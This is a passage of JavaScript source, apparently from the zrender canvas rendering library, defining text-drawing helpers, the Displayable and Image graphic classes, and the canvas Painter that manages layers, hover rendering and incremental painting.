prop, value) {\n    ctx[prop] = fixShadow(ctx, prop, value);\n    return ctx[prop];\n}\n\n/**\n * @param {string} [stroke] If specified, do not check style.textStroke.\n * @param {string} [lineWidth] If specified, do not check style.textStroke.\n * @param {number} style\n */\nfunction getStroke(stroke, lineWidth) {\n    return (stroke == null || lineWidth <= 0 || stroke === 'transparent' || stroke === 'none')\n        ? null\n        // TODO pattern and gradient?\n        : (stroke.image || stroke.colorStops)\n        ? '#000'\n        : stroke;\n}\n\nfunction getFill(fill) {\n    return (fill == null || fill === 'none')\n        ? null\n        // TODO pattern and gradient?\n        : (fill.image || fill.colorStops)\n        ? '#000'\n        : fill;\n}\n\nfunction parsePercent(value, maxValue) {\n    if (typeof value === 'string') {\n        if (value.lastIndexOf('%') >= 0) {\n            return parseFloat(value) / 100 * maxValue;\n        }\n        return parseFloat(value);\n    }\n    return value;\n}\n\nfunction getTextXForPadding(x, textAlign, textPadding) {\n    return textAlign === 'right'\n        ? (x - textPadding[1])\n        : textAlign === 'center'\n        ? (x + textPadding[3] / 2 - textPadding[1] / 2)\n        : (x + textPadding[3]);\n}\n\n/**\n * @param {string} text\n * @param {module:zrender/Style} style\n * @return {boolean}\n */\nfunction needDrawText(text, style) {\n    return text != null\n        && (text\n            || style.textBackgroundColor\n            || (style.textBorderWidth && style.textBorderColor)\n            || style.textPadding\n        );\n}\n\n/**\n * Mixin for drawing text in a element bounding rect\n * @module zrender/mixin/RectText\n */\n\nvar tmpRect$1 = new BoundingRect();\n\nvar RectText = function () {};\n\nRectText.prototype = {\n\n    constructor: RectText,\n\n    /**\n     * Draw text in a rect with specified position.\n     * @param  {CanvasRenderingContext2D} ctx\n     * @param  {Object} rect Displayable rect\n     */\n    drawRectText: function (ctx, rect) {\n        var style = this.style;\n\n        rect = style.textRect || rect;\n\n        // Optimize, avoid normalize every time.\n        this.__dirty && normalizeTextStyle(style, true);\n\n        var text = style.text;\n\n        // Convert to string\n        text != null && (text += '');\n\n        if (!needDrawText(text, style)) {\n            return;\n        }\n\n        // FIXME\n        // Do not provide prevEl to `textHelper.renderText` for ctx prop cache,\n        // but use `ctx.save()` and `ctx.restore()`. Because the cache for rect\n        // text propably break the cache for its host elements.\n        ctx.save();\n\n        // Transform rect to view space\n        var transform = this.transform;\n        if (!style.transformText) {\n            if (transform) {\n                tmpRect$1.copy(rect);\n                tmpRect$1.applyTransform(transform);\n                rect = tmpRect$1;\n            }\n        }\n        else {\n            this.setTransform(ctx);\n        }\n\n        // transformText and textRotation can not be used at the same time.\n        renderText(this, ctx, text, style, rect, WILL_BE_RESTORED);\n\n        ctx.restore();\n    }\n};\n\n/**\n * Base class of all displayable graphic objects\n * @module zrender/graphic/Displayable\n */\n\n\n/**\n * @alias module:zrender/graphic/Displayable\n * @extends module:zrender/Element\n * @extends module:zrender/graphic/mixin/RectText\n */\nfunction Displayable(opts) {\n\n    opts = opts || {};\n\n    Element.call(this, opts);\n\n    // Extend properties\n    for (var name in opts) {\n        if (\n            opts.hasOwnProperty(name)\n                && name !== 'style'\n        ) {\n            this[name] = opts[name];\n        }\n    }\n\n    /**\n     * @type {module:zrender/graphic/Style}\n     */\n    this.style = new Style(opts.style, this);\n\n    this._rect = null;\n    // Shapes for cascade clipping.\n    // Can only be `null`/`undefined` or an non-empty array, MUST NOT be an empty array.\n    // because it is easy to only using null to check whether clipPaths changed.\n    this.__clipPaths = null;\n\n    // FIXME Stateful must be mixined after style is setted\n    // Stateful.call(this, opts);\n}\n\nDisplayable.prototype = {\n\n    constructor: Displayable,\n\n    type: 'displayable',\n\n    /**\n     * Dirty flag. From which painter will determine if this displayable object needs brush.\n     * @name module:zrender/graphic/Displayable#__dirty\n     * @type {boolean}\n     */\n    __dirty: true,\n\n    /**\n     * Whether the displayable object is visible. when it is true, the displayable object\n     * is not drawn, but the mouse event can still trigger the object.\n     * @name module:/zrender/graphic/Displayable#invisible\n     * @type {boolean}\n     * @default false\n     */\n    invisible: false,\n\n    /**\n     * @name module:/zrender/graphic/Displayable#z\n     * @type {number}\n     * @default 0\n     */\n    z: 0,\n\n    /**\n     * @name module:/zrender/graphic/Displayable#z\n     * @type {number}\n     * @default 0\n     */\n    z2: 0,\n\n    /**\n     * The z level determines the displayable object can be drawn in which layer canvas.\n     * @name module:/zrender/graphic/Displayable#zlevel\n     * @type {number}\n     * @default 0\n     */\n    zlevel: 0,\n\n    /**\n     * Whether it can be dragged.\n     * @name module:/zrender/graphic/Displayable#draggable\n     * @type {boolean}\n     * @default false\n     */\n    draggable: false,\n\n    /**\n     * Whether is it dragging.\n     * @name module:/zrender/graphic/Displayable#draggable\n     * @type {boolean}\n     * @default false\n     */\n    dragging: false,\n\n    /**\n     * Whether to respond to mouse events.\n     * @name module:/zrender/graphic/Displayable#silent\n     * @type {boolean}\n     * @default false\n     */\n    silent: false,\n\n    /**\n     * If enable culling\n     * @type {boolean}\n     * @default false\n     */\n    culling: false,\n\n    /**\n     * Mouse cursor when hovered\n     * @name module:/zrender/graphic/Displayable#cursor\n     * @type {string}\n     */\n    cursor: 'pointer',\n\n    /**\n     * If hover area is bounding rect\n     * @name module:/zrender/graphic/Displayable#rectHover\n     * @type {string}\n     */\n    rectHover: false,\n\n    /**\n     * Render the element progressively when the value >= 0,\n     * usefull for large data.\n     * @type {boolean}\n     */\n    progressive: false,\n\n    /**\n     * @type {boolean}\n     */\n    incremental: false,\n    /**\n     * Scale ratio for global scale.\n     * @type {boolean}\n     */\n    globalScaleRatio: 1,\n\n    beforeBrush: function (ctx) {},\n\n    afterBrush: function (ctx) {},\n\n    /**\n     * Graphic drawing method.\n     * @param {CanvasRenderingContext2D} ctx\n     */\n    // Interface\n    brush: function (ctx, prevEl) {},\n\n    /**\n     * Get the minimum bounding box.\n     * @return {module:zrender/core/BoundingRect}\n     */\n    // Interface\n    getBoundingRect: function () {},\n\n    /**\n     * If displayable element contain coord x, y\n     * @param  {number} x\n     * @param  {number} y\n     * @return {boolean}\n     */\n    contain: function (x, y) {\n        return this.rectContain(x, y);\n    },\n\n    /**\n     * @param  {Function} cb\n     * @param  {}   context\n     */\n    traverse: function (cb, context) {\n        cb.call(context, this);\n    },\n\n    /**\n     * If bounding rect of element contain coord x, y\n     * @param  {number} x\n     * @param  {number} y\n     * @return {boolean}\n     */\n    rectContain: function (x, y) {\n        var coord = this.transformCoordToLocal(x, y);\n        var rect = this.getBoundingRect();\n        return rect.contain(coord[0], coord[1]);\n    },\n\n    /**\n     * Mark displayable element dirty and refresh next frame\n     */\n    dirty: function () {\n        this.__dirty = this.__dirtyText = true;\n\n        this._rect = null;\n\n        this.__zr && this.__zr.refresh();\n    },\n\n    /**\n     * If displayable object binded any event\n     * @return {boolean}\n     */\n    // TODO, events bound by bind\n    // isSilent: function () {\n    //     return !(\n    //         this.hoverable || this.draggable\n    //         || this.onmousemove || this.onmouseover || this.onmouseout\n    //         || this.onmousedown || this.onmouseup || this.onclick\n    //         || this.ondragenter || this.ondragover || this.ondragleave\n    //         || this.ondrop\n    //     );\n    // },\n    /**\n     * Alias for animate('style')\n     * @param {boolean} loop\n     */\n    animateStyle: function (loop) {\n        return this.animate('style', loop);\n    },\n\n    attrKV: function (key, value) {\n        if (key !== 'style') {\n            Element.prototype.attrKV.call(this, key, value);\n        }\n        else {\n            this.style.set(value);\n        }\n    },\n\n    /**\n     * @param {Object|string} key\n     * @param {*} value\n     */\n    setStyle: function (key, value) {\n        this.style.set(key, value);\n        this.dirty(false);\n        return this;\n    },\n\n    /**\n     * Use given style object\n     * @param  {Object} obj\n     */\n    useStyle: function (obj) {\n        this.style = new Style(obj, this);\n        this.dirty(false);\n        return this;\n    },\n\n    /**\n     * The string value of `textPosition` needs to be calculated to a real postion.\n     * For example, `'inside'` is calculated to `[rect.width/2, rect.height/2]`\n     * by default. See `contain/text.js#calculateTextPosition` for more details.\n     * But some coutom shapes like \"pin\", \"flag\" have center that is not exactly\n     * `[width/2, height/2]`. So we provide this hook to customize the calculation\n     * for those shapes. It will be called if the `style.textPosition` is a string.\n     * @param {Obejct} [out] Prepared out object. If not provided, this method should\n     *        be responsible for creating one.\n     * @param {module:zrender/graphic/Style} style\n     * @param {Object} rect {x, y, width, height}\n     * @return {Obejct} out The same as the input out.\n     *         {\n     *             x: number. mandatory.\n     *             y: number. mandatory.\n     *             textAlign: string. optional. use style.textAlign by default.\n     *             textVerticalAlign: string. optional. use style.textVerticalAlign by default.\n     *         }\n     */\n    calculateTextPosition: null\n};\n\ninherits(Displayable, Element);\n\nmixin(Displayable, RectText);\n\n/**\n * @alias zrender/graphic/Image\n * @extends module:zrender/graphic/Displayable\n * @constructor\n * @param {Object} opts\n */\nfunction ZImage(opts) {\n    Displayable.call(this, opts);\n}\n\nZImage.prototype = {\n\n    constructor: ZImage,\n\n    type: 'image',\n\n    brush: function (ctx, prevEl) {\n        var style = this.style;\n        var src = style.image;\n\n        // Must bind each time\n        style.bind(ctx, this, prevEl);\n\n        var image = this._image = createOrUpdateImage(\n            src,\n            this._image,\n            this,\n            this.onload\n        );\n\n        if (!image || !isImageReady(image)) {\n            return;\n        }\n\n        // 图片已经加载完成\n        // if (image.nodeName.toUpperCase() == 'IMG') {\n        //     if (!image.complete) {\n        //         return;\n        //     }\n        // }\n        // Else is canvas\n\n        var x = style.x || 0;\n        var y = style.y || 0;\n        var width = style.width;\n        var height = style.height;\n        var aspect = image.width / image.height;\n        if (width == null && height != null) {\n            // Keep image/height ratio\n            width = height * aspect;\n        }\n        else if (height == null && width != null) {\n            height = width / aspect;\n        }\n        else if (width == null && height == null) {\n            width = image.width;\n            height = image.height;\n        }\n\n        // 设置transform\n        this.setTransform(ctx);\n\n        if (style.sWidth && style.sHeight) {\n            var sx = style.sx || 0;\n            var sy = style.sy || 0;\n            ctx.drawImage(\n                image,\n                sx, sy, style.sWidth, style.sHeight,\n                x, y, width, height\n            );\n        }\n        else if (style.sx && style.sy) {\n            var sx = style.sx;\n            var sy = style.sy;\n            var sWidth = width - sx;\n            var sHeight = height - sy;\n            ctx.drawImage(\n                image,\n                sx, sy, sWidth, sHeight,\n                x, y, width, height\n            );\n        }\n        else {\n            ctx.drawImage(image, x, y, width, height);\n        }\n\n        // Draw rect text\n        if (style.text != null) {\n            // Only restore transform when needs draw text.\n            this.restoreTransform(ctx);\n            this.drawRectText(ctx, this.getBoundingRect());\n        }\n    },\n\n    getBoundingRect: function () {\n        var style = this.style;\n        if (!this._rect) {\n            this._rect = new BoundingRect(\n                style.x || 0, style.y || 0, style.width || 0, style.height || 0\n            );\n        }\n        return this._rect;\n    }\n};\n\ninherits(ZImage, Displayable);\n\nvar HOVER_LAYER_ZLEVEL = 1e5;\nvar CANVAS_ZLEVEL = 314159;\n\nvar EL_AFTER_INCREMENTAL_INC = 0.01;\nvar INCREMENTAL_INC = 0.001;\n\nfunction parseInt10(val) {\n    return parseInt(val, 10);\n}\n\nfunction isLayerValid(layer) {\n    if (!layer) {\n        return false;\n    }\n\n    if (layer.__builtin__) {\n        return true;\n    }\n\n    if (typeof (layer.resize) !== 'function'\n        || typeof (layer.refresh) !== 'function'\n    ) {\n        return false;\n    }\n\n    return true;\n}\n\nvar tmpRect = new BoundingRect(0, 0, 0, 0);\nvar viewRect = new BoundingRect(0, 0, 0, 0);\nfunction isDisplayableCulled(el, width, height) {\n    tmpRect.copy(el.getBoundingRect());\n    if (el.transform) {\n        tmpRect.applyTransform(el.transform);\n    }\n    viewRect.width = width;\n    viewRect.height = height;\n    return !tmpRect.intersect(viewRect);\n}\n\nfunction isClipPathChanged(clipPaths, prevClipPaths) {\n    // displayable.__clipPaths can only be `null`/`undefined` or an non-empty array.\n    if (clipPaths === prevClipPaths) {\n        return false;\n    }\n    if (!clipPaths || !prevClipPaths || (clipPaths.length !== prevClipPaths.length)) {\n        return true;\n    }\n    for (var i = 0; i < clipPaths.length; i++) {\n        if (clipPaths[i] !== prevClipPaths[i]) {\n            return true;\n        }\n    }\n    return false;\n}\n\nfunction doClip(clipPaths, ctx) {\n    for (var i = 0; i < clipPaths.length; i++) {\n        var clipPath = clipPaths[i];\n\n        clipPath.setTransform(ctx);\n        ctx.beginPath();\n        clipPath.buildPath(ctx, clipPath.shape);\n        ctx.clip();\n        // Transform back\n        clipPath.restoreTransform(ctx);\n    }\n}\n\nfunction createRoot(width, height) {\n    var domRoot = document.createElement('div');\n\n    // domRoot.onselectstart = returnFalse; // Avoid page selected\n    domRoot.style.cssText = [\n        'position:relative',\n        // IOS13 safari probably has a compositing bug (z order of the canvas and the consequent\n        // dom does not act as expected) when some of the parent dom has\n        // `-webkit-overflow-scrolling: touch;` and the webpage is longer than one screen and\n        // the canvas is not at the top part of the page.\n        // Check `https://bugs.webkit.org/show_bug.cgi?id=203681` for more details. We remove\n        // this `overflow:hidden` to avoid the bug.\n        // 'overflow:hidden',\n        'width:' + width + 'px',\n        'height:' + height + 'px',\n        'padding:0',\n        'margin:0',\n        'border-width:0'\n    ].join(';') + ';';\n\n    return domRoot;\n}\n\n\n/**\n * @alias module:zrender/Painter\n * @constructor\n * @param {HTMLElement} root 绘图容器\n * @param {module:zrender/Storage} storage\n * @param {Object} opts\n */\nvar Painter = function (root, storage, opts) {\n\n    this.type = 'canvas';\n\n    // In node environment using node-canvas\n    var singleCanvas = !root.nodeName // In node ?\n        || root.nodeName.toUpperCase() === 'CANVAS';\n\n    this._opts = opts = extend({}, opts || {});\n\n    /**\n     * @type {number}\n     */\n    this.dpr = opts.devicePixelRatio || devicePixelRatio;\n    /**\n     * @type {boolean}\n     * @private\n     */\n    this._singleCanvas = singleCanvas;\n    /**\n     * 绘图容器\n     * @type {HTMLElement}\n     */\n    this.root = root;\n\n    var rootStyle = root.style;\n\n    if (rootStyle) {\n        rootStyle['-webkit-tap-highlight-color'] = 'transparent';\n        rootStyle['-webkit-user-select'] =\n        rootStyle['user-select'] =\n        rootStyle['-webkit-touch-callout'] = 'none';\n\n        root.innerHTML = '';\n    }\n\n    /**\n     * @type {module:zrender/Storage}\n     */\n    this.storage = storage;\n\n    /**\n     * @type {Array.<number>}\n     * @private\n     */\n    var zlevelList = this._zlevelList = [];\n\n    /**\n     * @type {Object.<string, module:zrender/Layer>}\n     * @private\n     */\n    var layers = this._layers = {};\n\n    /**\n     * @type {Object.<string, Object>}\n     * @private\n     */\n    this._layerConfig = {};\n\n    /**\n     * zrender will do compositing when root is a canvas and have multiple zlevels.\n     */\n    this._needsManuallyCompositing = false;\n\n    if (!singleCanvas) {\n        this._width = this._getSize(0);\n        this._height = this._getSize(1);\n\n        var domRoot = this._domRoot = createRoot(\n            this._width, this._height\n        );\n        root.appendChild(domRoot);\n    }\n    else {\n        var width = root.width;\n        var height = root.height;\n\n        if (opts.width != null) {\n            width = opts.width;\n        }\n        if (opts.height != null) {\n            height = opts.height;\n        }\n        this.dpr = opts.devicePixelRatio || 1;\n\n        // Use canvas width and height directly\n        root.width = width * this.dpr;\n        root.height = height * this.dpr;\n\n        this._width = width;\n        this._height = height;\n\n        // Create layer if only one given canvas\n        // Device can be specified to create a high dpi image.\n        var mainLayer = new Layer(root, this, this.dpr);\n        mainLayer.__builtin__ = true;\n        mainLayer.initContext();\n        // FIXME Use canvas width and height\n        // mainLayer.resize(width, height);\n        layers[CANVAS_ZLEVEL] = mainLayer;\n        mainLayer.zlevel = CANVAS_ZLEVEL;\n        // Not use common zlevel.\n        zlevelList.push(CANVAS_ZLEVEL);\n\n        this._domRoot = root;\n    }\n\n    /**\n     * @type {module:zrender/Layer}\n     * @private\n     */\n    this._hoverlayer = null;\n\n    this._hoverElements = [];\n};\n\nPainter.prototype = {\n\n    constructor: Painter,\n\n    getType: function () {\n        return 'canvas';\n    },\n\n    /**\n     * If painter use a single canvas\n     * @return {boolean}\n     */\n    isSingleCanvas: function () {\n        return this._singleCanvas;\n    },\n    /**\n     * @return {HTMLDivElement}\n     */\n    getViewportRoot: function () {\n        return this._domRoot;\n    },\n\n    getViewportRootOffset: function () {\n        var viewportRoot = this.getViewportRoot();\n        if (viewportRoot) {\n            return {\n                offsetLeft: viewportRoot.offsetLeft || 0,\n                offsetTop: viewportRoot.offsetTop || 0\n            };\n        }\n    },\n\n    /**\n     * 刷新\n     * @param {boolean} [paintAll=false] 强制绘制所有displayable\n     */\n    refresh: function (paintAll) {\n\n        var list = this.storage.getDisplayList(true);\n\n        var zlevelList = this._zlevelList;\n\n        this._redrawId = Math.random();\n\n        this._paintList(list, paintAll, this._redrawId);\n\n        // Paint custum layers\n        for (var i = 0; i < zlevelList.length; i++) {\n            var z = zlevelList[i];\n            var layer = this._layers[z];\n            if (!layer.__builtin__ && layer.refresh) {\n                var clearColor = i === 0 ? this._backgroundColor : null;\n                layer.refresh(clearColor);\n            }\n        }\n\n        this.refreshHover();\n\n        return this;\n    },\n\n    addHover: function (el, hoverStyle) {\n        if (el.__hoverMir) {\n            return;\n        }\n        var elMirror = new el.constructor({\n            style: el.style,\n            shape: el.shape,\n            z: el.z,\n            z2: el.z2,\n            silent: el.silent\n        });\n        elMirror.__from = el;\n        el.__hoverMir = elMirror;\n        hoverStyle && elMirror.setStyle(hoverStyle);\n        this._hoverElements.push(elMirror);\n\n        return elMirror;\n    },\n\n    removeHover: function (el) {\n        var elMirror = el.__hoverMir;\n        var hoverElements = this._hoverElements;\n        var idx = indexOf(hoverElements, elMirror);\n        if (idx >= 0) {\n            hoverElements.splice(idx, 1);\n        }\n        el.__hoverMir = null;\n    },\n\n    clearHover: function (el) {\n        var hoverElements = this._hoverElements;\n        for (var i = 0; i < hoverElements.length; i++) {\n            var from = hoverElements[i].__from;\n            if (from) {\n                from.__hoverMir = null;\n            }\n        }\n        hoverElements.length = 0;\n    },\n\n    refreshHover: function () {\n        var hoverElements = this._hoverElements;\n        var len = hoverElements.length;\n        var hoverLayer = this._hoverlayer;\n        hoverLayer && hoverLayer.clear();\n\n        if (!len) {\n            return;\n        }\n        sort(hoverElements, this.storage.displayableSortFunc);\n\n        // Use a extream large zlevel\n        // FIXME?\n        if (!hoverLayer) {\n            hoverLayer = this._hoverlayer = this.getLayer(HOVER_LAYER_ZLEVEL);\n        }\n\n        var scope = {};\n        hoverLayer.ctx.save();\n        for (var i = 0; i < len;) {\n            var el = hoverElements[i];\n            var originalEl = el.__from;\n            // Original el is removed\n            // PENDING\n            if (!(originalEl && originalEl.__zr)) {\n                hoverElements.splice(i, 1);\n                originalEl.__hoverMir = null;\n                len--;\n                continue;\n            }\n            i++;\n\n            // Use transform\n            // FIXME style and shape ?\n            if (!originalEl.invisible) {\n                el.transform = originalEl.transform;\n                el.invTransform = originalEl.invTransform;\n                el.__clipPaths = originalEl.__clipPaths;\n                // el.\n                this._doPaintEl(el, hoverLayer, true, scope);\n            }\n        }\n\n        hoverLayer.ctx.restore();\n    },\n\n    getHoverLayer: function () {\n        return this.getLayer(HOVER_LAYER_ZLEVEL);\n    },\n\n    _paintList: function (list, paintAll, redrawId) {\n        if (this._redrawId !== redrawId) {\n            return;\n        }\n\n        paintAll = paintAll || false;\n\n        this._updateLayerStatus(list);\n\n        var finished = this._doPaintList(list, paintAll);\n\n        if (this._needsManuallyCompositing) {\n            this._compositeManually();\n        }\n\n        if (!finished) {\n            var self = this;\n            requestAnimationFrame(function () {\n                self._paintList(list, paintAll, redrawId);\n            });\n        }\n    },\n\n    _compositeManually: function () {\n        var ctx = this.getLayer(CANVAS_ZLEVEL).ctx;\n        var width = this._domRoot.width;\n        var height = this._domRoot.height;\n        ctx.clearRect(0, 0, width, height);\n        // PENDING, If only builtin layer?\n        this.eachBuiltinLayer(function (layer) {\n            if (layer.virtual) {\n                ctx.drawImage(layer.dom, 0, 0, width, height);\n            }\n        });\n    },\n\n    _doPaintList: function (list, paintAll) {\n        var layerList = [];\n        for (var zi = 0; zi < this._zlevelList.length; zi++) {\n            var zlevel = this._zlevelList[zi];\n            var layer = this._layers[zlevel];\n            if (layer.__builtin__\n                && layer !== this._hoverlayer\n                && (layer.__dirty || paintAll)\n            ) {\n                layerList.push(layer);\n            }\n        }\n\n        var finished = true;\n\n        for (var k = 0; k < layerList.length; k++) {\n            var layer = layerList[k];\n            var ctx = layer.ctx;\n            var scope = {};\n            ctx.save();\n\n            var start = paintAll ? layer.__startIndex : layer.__drawIndex;\n\n            var useTimer = !paintAll && layer.incremental && Date.now;\n            var startTime = useTimer && Date.now();\n\n            var clearColor = layer.zlevel === this._zlevelList[0]\n                ? this._backgroundColor : null;\n            // All elements in this layer are cleared.\n            if (layer.__startIndex === layer.__endIndex) {\n                layer.clear(false, clearColor);\n            }\n            else if (start === layer.__startIndex) {\n                var firstEl = list[start];\n                if (!firstEl.incremental || !firstEl.notClear || paintAll) {\n                    layer.clear(false, clearColor);\n                }\n            }\n            if (start === -1) {\n                console.error('For some unknown reason. drawIndex is -1');\n                start = layer.__startIndex;\n            }\n            for (var i = start; i < layer.__endIndex; i++) {\n                var el = list[i];\n                this._doPaintEl(el, layer, paintAll, scope);\n                el.__dirty = el.__dirtyText = false;\n\n                if (useTimer) {\n                    // Date.now can be executed in 13,025,305 ops/second.\n                    var dTime = Date.now() - startTime;\n                    // Give 15 millisecond to draw.\n                    // The rest elements will be drawn in the next frame.\n                    if (dTime > 15) {\n                        break;\n                    }\n                }\n            }\n\n            layer.__drawIndex = i;\n\n            if (layer.__drawIndex < layer.__endIndex) {\n                finished = false;\n            }\n\n            if (scope.prevElClipPaths) {\n                // Needs restore the state. If last drawn element is in the clipping area.\n                ctx.restore();\n            }\n\n            ctx.restore();\n        }\n\n        if (env$1.wxa) {\n            // Flush for weixin application\n            each$1(this._layers, function (layer) {\n                if (layer && layer.ctx && layer.ctx.draw) {\n                    layer.ctx.draw();\n                }\n            });\n        }\n\n        return finished;\n    },\n\n    _doPaintEl: function (el, currentLayer, forcePaint, scope) {\n        var ctx = currentLayer.ctx;\n        var m = el.transform;\n        if (\n            (currentLayer.__dirty || forcePaint)\n            // Ignore invisible element\n            && !el.invisible\n            // Ignore transparent element\n            && el.style.opacity !== 0\n            // Ignore scale 0 element, in some environment like node-canvas\n            // Draw a scale 0 element can cause all following draw wrong\n            // And setTransform with scale 0 will cause set back transform failed.\n            && !(m && !m[0] && !m[3])\n            // Ignore culled element\n            && !(el.culling && isDisplayableCulled(el, this._width, this._height))\n        ) {\n\n            var clipPaths = el.__clipPaths;\n            var prevElClipPaths = scope.prevElClipPaths;\n\n            // Optimize when clipping on group with several elements\n            if (!prevElClipPaths || isClipPathChanged(clipPaths, prevElClipPaths)) {\n                // If has previous clipping state, restore from it\n                if (prevElClipPaths) {\n                    ctx.restore();\n                    scope.prevElClipPaths = null;\n                    // Reset prevEl since context has been restored\n                    scope.prevEl = null;\n                }\n                // New clipping state\n                if (clipPaths) {\n                    ctx.save();\n                    doClip(clipPaths, ctx);\n                    scope.prevElClipPaths = clipPaths;\n                }\n            }\n            el.beforeBrush && el.beforeBrush(ctx);\n\n            el.brush(ctx, scope.prevEl || null);\n            scope.prevEl = el;\n\n            el.afterBrush && el.afterBrush(ctx);\n        }\n    },\n\n    /**\n     * 获取 zlevel 所在层，如果不存在则会创建一个新的层\n     * @param {number} zlevel\n     * @param {boolean} virtual Virtual layer will not be inserted into dom.\n     * @return {module:zrender/Layer}\n     */\n    getLayer: function (zlevel, virtual) {\n        if (this._singleCanvas && !this._needsManuallyCompositing) {\n            zlevel = CANVAS_ZLEVEL;\n        }\n        var layer = this._layers[zlevel];\n        if (!layer) {\n            // Create a new layer\n            layer = new Layer('zr_' + zlevel, this, this.dpr);\n            layer.zlevel = zlevel;\n            layer.__builtin__ = true;\n\n            if (this._layerConfig[zlevel]) {\n                merge(layer, this._layerConfig[zlevel], true);\n            }\n\n            if (virtual) {\n                layer.virtual = virtual;\n            }\n\n            this.insertLayer(zlevel, layer);\n\n            // Context is created after dom inserted to document\n            // Or excanvas will get 0px clientWidth and clientHeight\n            layer.initContext();\n        }\n\n        return layer;\n    },\n\n    insertLayer: function (zlevel, layer) {\n\n        var layersMap = this._layers;\n        var zlevelList = this._zlevelList;\n        var len = zlevelList.length;\n        var prevLayer = null;\n        var i = -1;\n        var domRoot = this._domRoot;\n\n        if (layersMap[zlevel]) {\n            logError$1('ZLevel ' + zlevel + ' has been used already');\n            return;\n        }\n        // Check if is a valid layer\n        if (!isLayerValid(layer)) {\n            logError$1('Layer of zlevel ' + zlevel + ' is not valid');\n            return;\n        }\n\n        if (len > 0 && zlevel > zlevelList[0]) {\n            for (i = 0; i < len - 1; i++) {\n                if (\n                    zlevelList[i] < zlevel\n                    && zlevelList[i + 1] > zlevel\n                ) {\n                    break;\n                }\n            }\n            prevLayer = layersMap[zlevelList[i]];\n        }\n        zlevelList.splice(i + 1, 0, zlevel);\n\n        layersMap[zlevel] = layer;\n\n        // Vitual layer will not directly show on the screen.\n        // (It can be a WebGL layer and assigned to a ZImage element)\n        // But it still under management of zrender.\n        if (!layer.virtual) {\n            if (prevLayer) {\n                var prevDom = prevLayer.dom;\n                if (prevDom.nextSibling) {\n                    domRoot.insertBefore(\n                        layer.dom,\n                        prevDom.nextSibling\n                    );\n                }\n                else {\n                    domRoot.appendChild(layer.dom);\n                }\n            }\n            else {\n                if (domRoot.firstChild) {\n                    domRoot.insertBefore(layer.dom, domRoot.firstChild);\n                }\n                else {\n                    domRoot.appendChild(layer.dom);\n                }\n            }\n        }\n    },\n\n    // Iterate each layer\n    eachLayer: function (cb, context) {\n        var zlevelList = this._zlevelList;\n        var z;\n        var i;\n        for (i = 0; i < zlevelList.length; i++) {\n            z = zlevelList[i];\n            cb.call(context, this._layers[z], z);\n        }\n    },\n\n    // Iterate each buildin layer\n    eachBuiltinLayer: function (cb, context) {\n        var zlevelList = this._zlevelList;\n        var layer;\n        var z;\n        var i;\n        for (i = 0; i < zlevelList.length; i++) {\n            z = zlevelList[i];\n            layer = this._layers[z];\n            if (layer.__builtin__) {\n                cb.call(context, layer, z);\n            }\n        }\n    },\n\n    // Iterate each other layer except buildin layer\n    eachOtherLayer: function (cb, context) {\n        var zlevelList = this._zlevelList;\n        var layer;\n        var z;\n        var i;\n        for (i = 0; i < zlevelList.length; i++) {\n            z = zlevelList[i];\n            layer = this._layers[z];\n            if (!layer.__builtin__) {\n                cb.call(context, layer, z);\n            }\n        }\n    },\n\n    /**\n     * 获取所有已创建的层\n     * @param {Array.<module:zrender/Layer>} [prevLayer]\n     */\n    getLayers: function () {\n        return this._layers;\n    },\n\n    _updateLayerStatus: function (list) {\n\n        this.eachBuiltinLayer(function (layer, z) {\n            layer.__dirty = layer.__used = false;\n        });\n\n        function updatePrevLayer(idx) {\n            if (prevLayer) {\n                if (prevLayer.__endIndex !== idx) {\n                    prevLayer.__dirty = true;\n                }\n                prevLayer.__endIndex = idx;\n            }\n        }\n\n        if (this._singleCanvas) {\n            for (var i = 1; i < list.length; i++) {\n                var el = list[i];\n                if (el.zlevel !== list[i - 1].zlevel || el.incremental) {\n                    this._needsManuallyCompositing = true;\n                    break;\n                }\n            }\n        }\n\n        var prevLayer = null;\n        var incrementalLayerCount = 0;\n        for (var i = 0; i < list.length; i++) {\n            var el = list[i];\n            var zlevel = el.zlevel;\n            var layer;\n            // PENDING If change one incremental element style ?\n            // TODO Where there are non-incremental elements between incremental elements.\n            if (el.incremental) {\n                layer = this.getLayer(zlevel + INCREMENTAL_INC, this._needsManuallyCompositing);\n                layer.incremental = true;\n                incrementalLayerCount = 1;\n            }\n            else {\n                layer = this.getLayer(\n                    zlevel + (incrementalLayerCount > 0 ? EL_AFTER_INCREMENTAL_INC : 0),\n                    this._needsManuallyCompositing\n                );\n            }\n\n            if (!layer.__builtin__) {\n                logError$1('ZLevel ' + zlevel + ' has been used by unkown layer ' + layer.id);\n            }\n\n            if (layer !== prevLayer) {\n                layer.__used = true;\n                if (layer.__startIndex !== i) {\n                    layer.__dirty = true;\n                }\n                layer.__startIndex = i;\n                if (!layer.incremental) {\n                    layer.__drawIndex = i;\n                }\n                else {\n                    // Mark layer draw index needs to update.\n                    layer.__drawIndex = -1;\n                }\n                updatePrevLayer(i);\n                prevLayer = layer;\n            }\n            if (el.__dirty) {\n                layer.__dirty = true;\n                if (layer.incremental && layer.__drawIndex < 0) {\n                    // Start draw from the first dirty element.\n                    layer.__drawIndex = i;\n                }\n            }\n        }\n\n        updatePrevLayer(i);\n\n        this.eachBuiltinLayer(function (layer, z) {\n            // Used in last frame but not in this frame. Needs clear\n            if (!layer.__used && layer.getElementCount() > 0) {\n                layer.__dirty = true;\n                layer.__startIndex = layer.__endIndex = layer.__drawIndex = 0;\n            }\n            // For incremental layer. In case start index changed and no elements are dirty.\n            if (layer.__dirty && layer.__drawIndex < 0) {\n                layer.__drawIndex = layer.__startIndex;\n            }\n        });\n    },\n\n    /**\n     * 清除hover层外所有内容\n     */\n    clear: function () {\n        this.eachBuiltinLayer(this._clearLayer);\n        return this;\n    },\n\n    _clearLayer: function (layer) {\n        layer.clear();\n    },\n\n    setBackgroundColor: function (backgroundColor) {\n        this._backgroundColor = backgroundColor;\n    },\n\n    /**\n     * 修改指定zlevel的绘制参数\n     *\n     * @param {string} zlevel\n     * @param {Object} config 配置对象\n     * @param {string} [config.clearColor=0] 每次清空画布的颜色\n     * @param {string} [config.motionBlur=false] 是否开启动态模糊\n     * @param {number} [config.lastFrameAlpha=0.7]\n     *                 在开启动态模糊的时候使用，与上一帧混合的alpha值，值越大尾迹越明显\n     */\n    configLayer: function (zlevel, config) {\n        if (config) {\n            var layerConfig = this._layerConfig;\n            if (!layerConfig[zlevel]) {\n                layerConfig[zlevel] = config;\n            }\n            else {\n                merge(layerConfig[zlevel], config, true);\n            }\n\n            for (var i = 0; i < this._zlevelList.length; i++) {\n                var _zlevel = this._zlevelList[i];\n                